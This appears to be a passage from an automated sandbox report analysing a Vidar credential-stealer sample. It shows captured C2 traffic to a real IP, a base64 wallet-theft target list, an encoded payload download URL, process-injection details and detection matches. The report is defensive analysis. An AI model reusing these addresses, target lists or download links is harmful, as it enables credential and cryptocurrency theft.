                                                                                                                                                                            Content-Length: 1145
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:27:14 UTC | 1145 | OUT |
                                                                                                                                                                            Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------KJJJKFIIIJJJECAAEHDBCont
2024-10-03 01:27:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:15 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:27:15 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49730 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:16 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:27:16 UTC | 331 | OUT |
                                                                                                                                                                            Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------DBFIEHDHIIIECAAKECFHCont
2024-10-03 01:27:17 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:16 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:27:17 UTC | 2228 | IN |
                                                                                                                                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49731 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:17 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:27:17 UTC | 331 | OUT |
                                                                                                                                                                            Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------JJKFBAKFBGDHIEBGDAKFCont
2024-10-03 01:27:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:18 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:27:18 UTC | 1524 | IN |
                                                                                                                                                                            Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49732 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:19 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 461
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:27:19 UTC | 461 | OUT |
                                                                                                                                                                            Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------EHIJDHCAKKFCBGCBAAECCont
2024-10-03 01:27:20 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:20 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:27:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49733 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:21 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 131345
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:27:21 UTC | 16355 | OUT |
                                                                                                                                                                            Data Ascii: ------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------GCBFBGCGIJKJJKFIDBFCCont
2024-10-03 01:27:23 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:22 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:27:23 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.9  49734        49.12.197.9     443               1420  C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-03 01:27:23 UTC  276                OUT        POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:27:23 UTC  331  OUT  Data Ascii:
------JDGCGHCGHCBFHJJKKJEH
Content-Disposition: form-data; name="token"

7919bb817d16eff5ed5041f1923e3db3
------JDGCGHCGHCBFHJJKKJEH
Content-Disposition: form-data; name="build_id"

b74ef0d8ce56e494b0d83e1d5be9dbeb
------JDGCGHCGHCBFHJJKKJEH
Cont
2024-10-03 01:27:24 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:24 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:27:24 UTC  91  IN  Data Ascii:
50
MTI2NjkxMnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zL2E0MzQ4NjEyODM0Ny5leGV8MXxra2trfA==
0



                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:21:26:16
                                                                                                                                                                            Start date:02/10/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                            Imagebase:0xbe0000
                                                                                                                                                                            File size:421'040 bytes
                                                                                                                                                                            MD5 hash:D5251BD2A4D9EE464B1DBB25245A67A7
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:1
                                                                                                                                                                            Start time:21:26:16
                                                                                                                                                                            Start date:02/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:21:26:16
                                                                                                                                                                            Start date:02/10/2024
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                            Imagebase:0x760000
                                                                                                                                                                            File size:43'016 bytes
                                                                                                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:false


                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:12.9%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:7%
                                                                                                                                                                              Total number of Nodes:1043
                                                                                                                                                                              Total number of Limit Nodes:15
___scrt_is_nonwritable_in_current_image 12110->12111 12112 6d5d2fb7 _unexpected 39 API calls 12111->12112 12113 6d5d5f01 12112->12113 12114 6d5d5f47 12113->12114 12123 6d5d3383 EnterCriticalSection 12113->12123 12114->12103 12116 6d5d5f1f 12124 6d5d5f6d 12116->12124 12121 6d5d2aeb CallUnexpected 39 API calls 12122 6d5d5f6c 12121->12122 12123->12116 12125 6d5d5f30 12124->12125 12126 6d5d5f7b _unexpected 12124->12126 12128 6d5d5f4c 12125->12128 12126->12125 12127 6d5d5ca0 _unexpected 14 API calls 12126->12127 12127->12125 12131 6d5d33cb LeaveCriticalSection 12128->12131 12130 6d5d5f43 12130->12114 12130->12121 12131->12130 12133 6d5d2fb7 _unexpected 39 API calls 12132->12133 12134 6d5d45da 12133->12134 12135 6d5d44ed ___scrt_uninitialize_crt 39 API calls 12134->12135 12136 6d5d45e5 12135->12136 12136->12108 12138 6d5d421b GetCPInfo 12137->12138 12139 6d5d42e4 12137->12139 12138->12139 12144 6d5d4233 12138->12144 12141 6d5cd100 CatchGuardHandler 5 API calls 12139->12141 12143 6d5d4396 12141->12143 12143->12073 12148 6d5d622d 12144->12148 12147 6d5d6be3 43 API calls 12147->12139 12149 6d5d3c23 39 API calls 12148->12149 12150 6d5d624d 12149->12150 12168 6d5d4987 12150->12168 12152 6d5d6309 12154 6d5cd100 CatchGuardHandler 5 API calls 12152->12154 12153 6d5d6301 12171 6d5d632e 12153->12171 12157 6d5d429b 12154->12157 12155 6d5d627a 12155->12152 12155->12153 12156 6d5d33e2 15 API calls 12155->12156 12159 6d5d629f __alloca_probe_16 std::bad_exception::bad_exception 12155->12159 12156->12159 12163 6d5d6be3 12157->12163 12159->12153 12160 6d5d4987 ___scrt_uninitialize_crt MultiByteToWideChar 12159->12160 12161 6d5d62e8 12160->12161 12161->12153 12162 6d5d62ef GetStringTypeW 12161->12162 12162->12153 12164 6d5d3c23 39 API calls 12163->12164 12165 6d5d6bf6 12164->12165 12177 6d5d69f4 12165->12177 12175 6d5d48ef 12168->12175 12172 6d5d634b 12171->12172 12173 6d5d633a 12171->12173 12172->12152 12173->12172 12174 6d5d3430 __freea 14 API calls 12173->12174 12174->12172 12176 
6d5d4900 MultiByteToWideChar 12175->12176 12176->12155 12178 6d5d6a0f 12177->12178 12179 6d5d4987 ___scrt_uninitialize_crt MultiByteToWideChar 12178->12179 12182 6d5d6a53 12179->12182 12180 6d5d6bce 12181 6d5cd100 CatchGuardHandler 5 API calls 12180->12181 12183 6d5d42bc 12181->12183 12182->12180 12184 6d5d33e2 15 API calls 12182->12184 12186 6d5d6a79 __alloca_probe_16 12182->12186 12197 6d5d6b21 12182->12197 12183->12147 12184->12186 12185 6d5d632e __freea 14 API calls 12185->12180 12187 6d5d4987 ___scrt_uninitialize_crt MultiByteToWideChar 12186->12187 12186->12197 12188 6d5d6ac2 12187->12188 12188->12197 12205 6d5d4f38 12188->12205 12191 6d5d6af8 12196 6d5d4f38 6 API calls 12191->12196 12191->12197 12192 6d5d6b30 12193 6d5d6bb9 12192->12193 12194 6d5d33e2 15 API calls 12192->12194 12198 6d5d6b42 __alloca_probe_16 12192->12198 12195 6d5d632e __freea 14 API calls 12193->12195 12194->12198 12195->12197 12196->12197 12197->12185 12198->12193 12199 6d5d4f38 6 API calls 12198->12199 12200 6d5d6b85 12199->12200 12200->12193 12211 6d5d4a41 12200->12211 12202 6d5d6b9f 12202->12193 12203 6d5d6ba8 12202->12203 12204 6d5d632e __freea 14 API calls 12203->12204 12204->12197 12214 6d5d4c0b 12205->12214 12209 6d5d4f89 LCMapStringW 12210 6d5d4f49 12209->12210 12210->12191 12210->12192 12210->12197 12213 6d5d4a54 ___scrt_uninitialize_crt 12211->12213 12212 6d5d4a92 WideCharToMultiByte 12212->12202 12213->12212 12215 6d5d4d0a _unexpected 5 API calls 12214->12215 12216 6d5d4c21 12215->12216 12216->12210 12217 6d5d4f95 12216->12217 12220 6d5d4c25 12217->12220 12219 6d5d4fa0 12219->12209 12221 6d5d4d0a _unexpected 5 API calls 12220->12221 12222 6d5d4c3b 12221->12222 12222->12219 12223->12084 12234 6d5d47ed 12224->12234 12226 6d5d4080 12227 6d5d47ed 39 API calls 12226->12227 12228 6d5d409f 12227->12228 12229 6d5d4034 12228->12229 12230 6d5d3430 __freea 14 API calls 12228->12230 12231 6d5d4052 12229->12231 12230->12229 12248 6d5d33cb LeaveCriticalSection 12231->12248 12233 6d5d4040 
12233->11580 12235 6d5d47fe 12234->12235 12239 6d5d47fa __InternalCxxFrameHandler 12234->12239 12236 6d5d4805 12235->12236 12240 6d5d4818 std::bad_exception::bad_exception 12235->12240 12237 6d5d3553 __dosmaperr 14 API calls 12236->12237 12238 6d5d480a 12237->12238 12241 6d5d1b98 ___std_exception_copy 39 API calls 12238->12241 12239->12226 12240->12239 12242 6d5d484f 12240->12242 12243 6d5d4846 12240->12243 12241->12239 12242->12239 12245 6d5d3553 __dosmaperr 14 API calls 12242->12245 12244 6d5d3553 __dosmaperr 14 API calls 12243->12244 12246 6d5d484b 12244->12246 12245->12246 12247 6d5d1b98 ___std_exception_copy 39 API calls 12246->12247 12247->12239 12248->12233 12250 6d5d2a9f 12249->12250 12251 6d5d2aad 12249->12251 12250->12251 12256 6d5d2ac5 12250->12256 12252 6d5d3553 __dosmaperr 14 API calls 12251->12252 12253 6d5d2ab5 12252->12253 12255 6d5d1b98 ___std_exception_copy 39 API calls 12253->12255 12254 6d5d2abf 12254->11521 12255->12254 12256->12254 12257 6d5d3553 __dosmaperr 14 API calls 12256->12257 12257->12253 12259 6d5d2687 12258->12259 12263 6d5d2658 12258->12263 12260 6d5d269e 12259->12260 12261 6d5d3430 __freea 14 API calls 12259->12261 12262 6d5d3430 __freea 14 API calls 12260->12262 12261->12259 12262->12263 12263->11532 12697 6d5cd4b4 12698 6d5cd4bd 12697->12698 12699 6d5cd4c2 12697->12699 12718 6d5cd698 12698->12718 12703 6d5cd37e 12699->12703 12705 6d5cd38a ___scrt_is_nonwritable_in_current_image 12703->12705 12704 6d5cd399 12705->12704 12706 6d5cd3b3 dllmain_raw 12705->12706 12707 6d5cd3ae 12705->12707 12706->12704 12708 6d5cd3cd dllmain_crt_dispatch 12706->12708 12709 6d5c22c0 __DllMainCRTStartup@12 5 API calls 12707->12709 12708->12704 12708->12707 12710 6d5cd3ee 12709->12710 12711 6d5cd41f 12710->12711 12713 6d5c22c0 __DllMainCRTStartup@12 5 API calls 12710->12713 12711->12704 12712 6d5cd428 dllmain_crt_dispatch 12711->12712 12712->12704 12714 6d5cd43b dllmain_raw 12712->12714 12715 6d5cd406 12713->12715 12714->12704 12716 6d5cd2ce 
__DllMainCRTStartup@12 86 API calls 12715->12716 12717 6d5cd414 dllmain_raw 12716->12717 12717->12711 12719 6d5cd6ae 12718->12719 12721 6d5cd6b7 12719->12721 12722 6d5cd64b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12719->12722 12721->12699 12722->12721
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
Yara matches
Similarity
• API ID: Process$Memory$Write$AllocVirtual$Thread$Context$CloseHandleWow64$CreateReadResume
• String ID: =$P$@$AV2VkbmVzZGF5AAAAAAAAAFRodXJzZGF5AAAAAEZyaWRheQAAAAAAAFNhdHVyZGF5AAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAAAAAABKYW51YXJ5AEZlYnJ1YXJ5AAAAAE1hcmNoAAAAQXByaWwAAABKdW5lAAAAAEp1bHkAAAAAQXVndXN0AAAAAAAAU2VwdGVtYmVyAAAAAAAAAE9jdG9iZXIATm9$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$LB8a$MNNW$Q(]Q$R_1E$R_1E$Yo"a$eyM$eyM$kernel32.dll$ntdll.dll$xJU]$xL Q$+wk
• API String ID: 167752296-944074378
• Opcode ID: 7a2ac431229da6846c71fa0bef69a0985e47fc51744395324c19f63b66c4c732
• Instruction ID: 5dd909bb6a1c4a3188cc47e6d38bcaadb5cdfd06e7070ed58e2aa68a83d91735
• Opcode Fuzzy Hash: 7a2ac431229da6846c71fa0bef69a0985e47fc51744395324c19f63b66c4c732
• Instruction Fuzzy Hash: 75D33472A54655CFCB1CCE7CCEA87E977F1BB86305F009989D406EBB50D6399A888F01
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
Yara matches
Similarity
• API ID: Handle$Close$File$Module$CreateCurrentProcessProtectViewVirtual$Information
• String ID: !;!q$0WS$0WS$@
• API String ID: 2283251458-2458510083
• Opcode ID: 093e8a777c39545ddb40ffa94e587bd4101b043fc6383d2b3f62916f2b9b8df2
• Instruction ID: c7de3464a605723123b0651d1e9192f18b5acdf0f7cfd76ecb25097c53b906d5
• Opcode Fuzzy Hash: 093e8a777c39545ddb40ffa94e587bd4101b043fc6383d2b3f62916f2b9b8df2
• Instruction Fuzzy Hash: 6FD2CC75A542198FCB08CF3CC8A57EEBBF1BB4A310F109959E419EB794D6359988CF02

Control-flow Graph (first node 6d5ba4e0-6d5ba53b; legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
Yara matches
Similarity
• API ID: HandleModule
• String ID: Ca6\$NtQueryInformationProcess$ntdll.dll
• API String ID: 4139908857-3645646939
• Opcode ID: f2b5a0f75455deb592f90d6f6b83c2309a395e0195de1749135b245b32b612ba
• Instruction ID: ba0d67163c62cbd84aba96c2ebb58495c1747569c1b6bf5f96c40c812ce476cf
• Opcode Fuzzy Hash: f2b5a0f75455deb592f90d6f6b83c2309a395e0195de1749135b245b32b612ba
• Instruction Fuzzy Hash: 48C13372A942058FCF0DCE7CC6A0BCD7BF2BB42314F11891AD425EBA95D775994ACB01

Control-flow Graph (first node 6d5cd2ce-6d5cd2e1; legend: Executed / Not Executed)
APIs
• __RTC_Initialize.LIBCMT ref: 6D5CD315
• ___scrt_uninitialize_crt.LIBCMT ref: 6D5CD32F
Memory Dump Source
• Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
Yara matches
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0
• Opcode ID: 97dc587f2abcf5f0b60a0c9491d4f8bc78a805b376d32d77a929dc92082115e3
• Instruction ID: d251a2d190574314e4bb446c2cf1fccbccf5f84b9f90a2fea9d9f3c49cf742b0
• Opcode Fuzzy Hash: 97dc587f2abcf5f0b60a0c9491d4f8bc78a805b376d32d77a929dc92082115e3
• Instruction Fuzzy Hash: 4E412572D88615EBDB188FE5CC80BAE76B4EBC1BA4F12441FEA14D7A40C7705D41CB92

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                              • Opcode ID: c47e190cd49cc28ea0e0c6bcdb5652384382cd04dae2c50441c2bdcfeeddc875
                                                                                                                                                                              • Instruction ID: bc26a96fef9039c1c5a28316f3cda68bc9d22586e44ff544c3f5ab8d3dc9193b
                                                                                                                                                                              • Opcode Fuzzy Hash: c47e190cd49cc28ea0e0c6bcdb5652384382cd04dae2c50441c2bdcfeeddc875
                                                                                                                                                                              • Instruction Fuzzy Hash: 66219172D85616ABDB298ED5CC80A7F3A78EBC1BD4B02451FFA14D7A10C7709D418BE2

                                                                                                                                                                              APIs
                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6D5CD214
                                                                                                                                                                                • Part of subcall function 6D5CD6E3: InitializeSListHead.KERNEL32(6D642CC0,6D5CD21E,6D5E0D80,00000010,6D5CD1AF,?,?,?,6D5CD3D7,?,00000001,?,?,00000001,?,6D5E0DC8), ref: 6D5CD6E8
                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D5CD27E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
